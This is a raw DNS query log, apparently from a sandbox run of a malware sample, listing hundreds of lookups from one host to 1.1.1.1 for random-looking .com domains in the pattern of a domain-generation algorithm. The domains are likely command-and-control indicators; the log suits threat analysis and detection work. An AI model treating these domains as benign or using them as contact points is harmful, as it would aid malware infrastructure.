                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.850474119 CET192.168.2.61.1.1.10x2a75Standard query (0)gaqycos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.851483107 CET192.168.2.61.1.1.10x71afStandard query (0)vojyjof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.851593018 CET192.168.2.61.1.1.10xb107Standard query (0)pumypog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.852171898 CET192.168.2.61.1.1.10xdbf6Standard query (0)purycap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.852581978 CET192.168.2.61.1.1.10xb6a1Standard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.852802038 CET192.168.2.61.1.1.10x8a94Standard query (0)lygygin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.852967024 CET192.168.2.61.1.1.10x9ff0Standard query (0)vocyruk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.853272915 CET192.168.2.61.1.1.10x9298Standard query (0)vopybyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.853411913 CET192.168.2.61.1.1.10x1247Standard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.853858948 CET192.168.2.61.1.1.10x8fd3Standard query (0)gahyhob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.871095896 CET192.168.2.61.1.1.10xdca1Standard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.871251106 CET192.168.2.61.1.1.10xe64eStandard query (0)qexylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.871639967 CET192.168.2.61.1.1.10x6177Standard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.871962070 CET192.168.2.61.1.1.10x504aStandard query (0)gaqydeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.872088909 CET192.168.2.61.1.1.10x44deStandard query (0)lyxylux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.872180939 CET192.168.2.61.1.1.10xdec7Standard query (0)pufymoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.875371933 CET192.168.2.61.1.1.10xe564Standard query (0)qebytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.878606081 CET192.168.2.61.1.1.10xd5f1Standard query (0)puvyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.883663893 CET192.168.2.61.1.1.10xabfcStandard query (0)pufygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.886719942 CET192.168.2.61.1.1.10xb8b9Standard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.886888981 CET192.168.2.61.1.1.10x6d03Standard query (0)gacyryw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.891603947 CET192.168.2.61.1.1.10x1eebStandard query (0)lysynur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.893399954 CET192.168.2.61.1.1.10xf3aStandard query (0)volykyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.893996000 CET192.168.2.61.1.1.10x5a47Standard query (0)vofymik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.896539927 CET192.168.2.61.1.1.10x79c1Standard query (0)pupybul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:24.791176081 CET192.168.2.61.1.1.10xbf77Standard query (0)qetyvep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:24.826234102 CET192.168.2.61.1.1.10xd3b2Standard query (0)lyvytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:24.827466011 CET192.168.2.61.1.1.10x6b28Standard query (0)gatyvyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:24.855489969 CET192.168.2.61.1.1.10x95Standard query (0)pujyjav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:24.946764946 CET192.168.2.61.1.1.10xe027Standard query (0)lykyjad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:24.978303909 CET192.168.2.61.1.1.10xdc30Standard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.046587944 CET192.168.2.61.1.1.10x964fStandard query (0)qekykev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.106446981 CET192.168.2.61.1.1.10xe222Standard query (0)galykes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.116779089 CET192.168.2.61.1.1.10x7dddStandard query (0)gadyfuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.117336988 CET192.168.2.61.1.1.10x2ef8Standard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.167587042 CET192.168.2.61.1.1.10x8bf4Standard query (0)qedynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.169997931 CET192.168.2.61.1.1.10xedacStandard query (0)purydyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.200632095 CET192.168.2.61.1.1.10xfc90Standard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.205337048 CET192.168.2.61.1.1.10x74f5Standard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.205821991 CET192.168.2.61.1.1.10xabc3Standard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.229994059 CET192.168.2.61.1.1.10x8031Standard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.232130051 CET192.168.2.61.1.1.10x7d6fStandard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.232412100 CET192.168.2.61.1.1.10xf8f7Standard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.242862940 CET192.168.2.61.1.1.10xf8e5Standard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.802767038 CET192.168.2.61.1.1.10xf224Standard query (0)ganycob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.806097984 CET192.168.2.61.1.1.10xc282Standard query (0)vonycaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.807919979 CET192.168.2.61.1.1.10x5eccStandard query (0)qekyryp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.808532000 CET192.168.2.61.1.1.10xfe79Standard query (0)vopyguk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.818212986 CET192.168.2.61.1.1.10x1b41Standard query (0)pumycav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.823543072 CET192.168.2.61.1.1.10x5113Standard query (0)qedyhiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.823946953 CET192.168.2.61.1.1.10x79e3Standard query (0)lysygij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.840456009 CET192.168.2.61.1.1.10x2031Standard query (0)volyrut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.862776041 CET192.168.2.61.1.1.10xdb10Standard query (0)galyryz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.867217064 CET192.168.2.61.1.1.10xf849Standard query (0)qegyryq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.868154049 CET192.168.2.61.1.1.10x3183Standard query (0)gacycaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.869241953 CET192.168.2.61.1.1.10xa892Standard query (0)purygiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.869612932 CET192.168.2.61.1.1.10x6662Standard query (0)vocycat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.875363111 CET192.168.2.61.1.1.10x95d2Standard query (0)puvycel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.876816034 CET192.168.2.61.1.1.10xe23eStandard query (0)pupymol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.889777899 CET192.168.2.61.1.1.10x163aStandard query (0)gahyruh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.891088009 CET192.168.2.61.1.1.10x3a07Standard query (0)lyvysaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.893723011 CET192.168.2.61.1.1.10xb8dfStandard query (0)lygyjan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.895461082 CET192.168.2.61.1.1.10x5900Standard query (0)gahykeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.928287029 CET192.168.2.61.1.1.10x6afaStandard query (0)qegykeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.928631067 CET192.168.2.61.1.1.10xabf9Standard query (0)puzytul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.937047958 CET192.168.2.61.1.1.10x53d0Standard query (0)gaqyvys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.937215090 CET192.168.2.61.1.1.10x724aStandard query (0)lymyfyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.937572002 CET192.168.2.61.1.1.10x3c65Standard query (0)lygywyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.937891006 CET192.168.2.61.1.1.10x3928Standard query (0)lyxytur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.938045979 CET192.168.2.61.1.1.10x2de3Standard query (0)pufyjag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.938215017 CET192.168.2.61.1.1.10xafbfStandard query (0)qetynup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.938646078 CET192.168.2.61.1.1.10x3804Standard query (0)lyrygid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.948983908 CET192.168.2.61.1.1.10xb85eStandard query (0)puvypoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.949187994 CET192.168.2.61.1.1.10x342dStandard query (0)vowyguf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.950498104 CET192.168.2.61.1.1.10xfe27Standard query (0)qexyxop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.950700045 CET192.168.2.61.1.1.10xbcceStandard query (0)gaqyfub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.950841904 CET192.168.2.61.1.1.10x4379Standard query (0)pufyweq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.950985909 CET192.168.2.61.1.1.10xdc23Standard query (0)vofyqek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.951155901 CET192.168.2.61.1.1.10x84d8Standard query (0)lyxyxox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.951698065 CET192.168.2.61.1.1.10xa16dStandard query (0)qebysaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.951873064 CET192.168.2.61.1.1.10xa612Standard query (0)qeqyfug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.952027082 CET192.168.2.61.1.1.10x63c1Standard query (0)purybup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.960750103 CET192.168.2.61.1.1.10xcd34Standard query (0)volyzic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.960988998 CET192.168.2.61.1.1.10x2fe1Standard query (0)qedyqal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.961174965 CET192.168.2.61.1.1.10x8f45Standard query (0)qeqyvev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.962126970 CET192.168.2.61.1.1.10xe93Standard query (0)pumydyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.962308884 CET192.168.2.61.1.1.10x2441Standard query (0)vocypok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.962475061 CET192.168.2.61.1.1.10x9f4cStandard query (0)vonydem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.962613106 CET192.168.2.61.1.1.10xf95fStandard query (0)qekyluv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.963047981 CET192.168.2.61.1.1.10x2c37Standard query (0)ganydeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.963236094 CET192.168.2.61.1.1.10xaa74Standard query (0)lykylud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.963411093 CET192.168.2.61.1.1.10xc9b2Standard query (0)vopymit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.963743925 CET192.168.2.61.1.1.10xe64bStandard query (0)pujylyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.963979006 CET192.168.2.61.1.1.10x9fa8Standard query (0)gatyniz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.964162111 CET192.168.2.61.1.1.10x21a8Standard query (0)gadyqaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.964308977 CET192.168.2.61.1.1.10x276Standard query (0)lyrynux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.964700937 CET192.168.2.61.1.1.10x41d7Standard query (0)lykywex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.964988947 CET192.168.2.61.1.1.10x24adStandard query (0)pupyguq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.965270042 CET192.168.2.61.1.1.10x6e4cStandard query (0)vowybyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.965476990 CET192.168.2.61.1.1.10xb6b5Standard query (0)vojykyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.983352900 CET192.168.2.61.1.1.10xce12Standard query (0)gadyhoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.985322952 CET192.168.2.61.1.1.10x4280Standard query (0)lymyved.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.985519886 CET192.168.2.61.1.1.10xda0aStandard query (0)gacypiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.985685110 CET192.168.2.61.1.1.10x6f48Standard query (0)qexytil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.985822916 CET192.168.2.61.1.1.10xb1f1Standard query (0)puzyxip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.992259026 CET192.168.2.61.1.1.10x51cStandard query (0)lysymor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.994580984 CET192.168.2.61.1.1.10x6dfeStandard query (0)vofyjom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:27.604384899 CET192.168.2.61.1.1.10xa81dStandard query (0)gaqycos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:27.653933048 CET192.168.2.61.1.1.10xc962Standard query (0)pumypog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:27.731215000 CET192.168.2.61.1.1.10x93c1Standard query (0)qexyryl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:27.922898054 CET192.168.2.61.1.1.10xf038Standard query (0)galyzus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:28.414753914 CET192.168.2.61.1.1.10x6948Standard query (0)lyxylux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:28.572633982 CET192.168.2.61.1.1.10x4271Standard query (0)pupybul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:28.651174068 CET192.168.2.61.1.1.10x24Standard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:28.802656889 CET192.168.2.61.1.1.10xdc23Standard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:28.891529083 CET192.168.2.61.1.1.10x39c8Standard query (0)qexylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:28.993545055 CET192.168.2.61.1.1.10x78ecStandard query (0)vofymik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:28.997504950 CET192.168.2.61.1.1.10xdf42Standard query (0)pufymoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:29.064702988 CET192.168.2.61.1.1.10x848eStandard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:29.242857933 CET192.168.2.61.1.1.10x549bStandard query (0)gacyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:29.345345020 CET192.168.2.61.1.1.10x20dfStandard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:29.702817917 CET192.168.2.61.1.1.10x9313Standard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:30.384393930 CET192.168.2.61.1.1.10x70f4Standard query (0)lygymoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:30.414068937 CET192.168.2.61.1.1.10x523fStandard query (0)qekyqop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:30.604048967 CET192.168.2.61.1.1.10xb6efStandard query (0)purycap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:30.635262012 CET192.168.2.61.1.1.10xe201Standard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:30.786735058 CET192.168.2.61.1.1.10xbb89Standard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:30.891264915 CET192.168.2.61.1.1.10xaec8Standard query (0)lygygin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:31.045201063 CET192.168.2.61.1.1.10xfff5Standard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:31.123116016 CET192.168.2.61.1.1.10x6e26Standard query (0)pufygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:31.393201113 CET192.168.2.61.1.1.10xe9aaStandard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:31.463169098 CET192.168.2.61.1.1.10xa5d2Standard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:31.495208979 CET192.168.2.61.1.1.10x3d79Standard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:31.584768057 CET192.168.2.61.1.1.10xb006Standard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:31.700371027 CET192.168.2.61.1.1.10x90f7Standard query (0)purydyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:31.748594046 CET192.168.2.61.1.1.10x51c2Standard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:31.749836922 CET192.168.2.61.1.1.10xa336Standard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:31.926378012 CET192.168.2.61.1.1.10xffddStandard query (0)gadyfuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:32.043087959 CET192.168.2.61.1.1.10xbe6aStandard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:32.092561007 CET192.168.2.61.1.1.10xd8a5Standard query (0)lyryvex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:32.121015072 CET192.168.2.61.1.1.10x8fdeStandard query (0)lysynur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:32.191405058 CET192.168.2.61.1.1.10x8181Standard query (0)galykes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:32.215209961 CET192.168.2.61.1.1.10x3dd8Standard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:32.274835110 CET192.168.2.61.1.1.10x5af0Standard query (0)qebytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:32.581823111 CET192.168.2.61.1.1.10x8a93Standard query (0)vopybyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:32.582339048 CET192.168.2.61.1.1.10xa102Standard query (0)pujyjav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:32.850594044 CET192.168.2.61.1.1.10xa31fStandard query (0)gatyvyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:32.940380096 CET192.168.2.61.1.1.10x6f3cStandard query (0)pumydyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:32.940783024 CET192.168.2.61.1.1.10x2226Standard query (0)gacypiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:32.975958109 CET192.168.2.61.1.1.10x3122Standard query (0)vofyjom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.432344913 CET192.168.2.61.1.1.10xcb5aStandard query (0)lyvytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.434179068 CET192.168.2.61.1.1.10x75d0Standard query (0)vojyjof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.475600958 CET192.168.2.61.1.1.10xf141Standard query (0)qetyvep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.480500937 CET192.168.2.61.1.1.10x79e0Standard query (0)lysymor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.481863022 CET192.168.2.61.1.1.10x7170Standard query (0)galyzus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.484599113 CET192.168.2.61.1.1.10x2bb2Standard query (0)gahyhob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.485570908 CET192.168.2.61.1.1.10x3538Standard query (0)lykylud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.489969969 CET192.168.2.61.1.1.10x752bStandard query (0)puzyxip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.534439087 CET192.168.2.61.1.1.10xca65Standard query (0)gaqyvys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.538279057 CET192.168.2.61.1.1.10x1771Standard query (0)pujylyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.538814068 CET192.168.2.61.1.1.10x5c0aStandard query (0)puvytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.539391994 CET192.168.2.61.1.1.10x4083Standard query (0)qeqyfug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.552567005 CET192.168.2.61.1.1.10x3f5dStandard query (0)lyrygid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.648226976 CET192.168.2.61.1.1.10x9dd1Standard query (0)lykyjad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.650856018 CET192.168.2.61.1.1.10x61cdStandard query (0)puvyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.707451105 CET192.168.2.61.1.1.10x57d2Standard query (0)qekyluv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.710880995 CET192.168.2.61.1.1.10x9242Standard query (0)qeqyvev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.774678946 CET192.168.2.61.1.1.10xed6aStandard query (0)volyzic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.775126934 CET192.168.2.61.1.1.10x12adStandard query (0)puvypoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.828207970 CET192.168.2.61.1.1.10xc76Standard query (0)lyxyxox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.839971066 CET192.168.2.61.1.1.10x6699Standard query (0)qexyxop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.877986908 CET192.168.2.61.1.1.10xfeb8Standard query (0)vojykyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.901956081 CET192.168.2.61.1.1.10x7a70Standard query (0)lyrynux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:33.943068027 CET192.168.2.61.1.1.10xea61Standard query (0)gatyniz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.038815022 CET192.168.2.61.1.1.10x1c6dStandard query (0)vocypok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.040832043 CET192.168.2.61.1.1.10x6b0cStandard query (0)lykywex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.155720949 CET192.168.2.61.1.1.10xd123Standard query (0)gadyqaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.161046982 CET192.168.2.61.1.1.10x222aStandard query (0)lymyved.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.280922890 CET192.168.2.61.1.1.10xbe64Standard query (0)ganydeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.281198978 CET192.168.2.61.1.1.10x557cStandard query (0)qexytil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:34.282016039 CET192.168.2.61.1.1.10x6600Standard query (0)vowybyc.comA (IP address)IN (0x0001)false
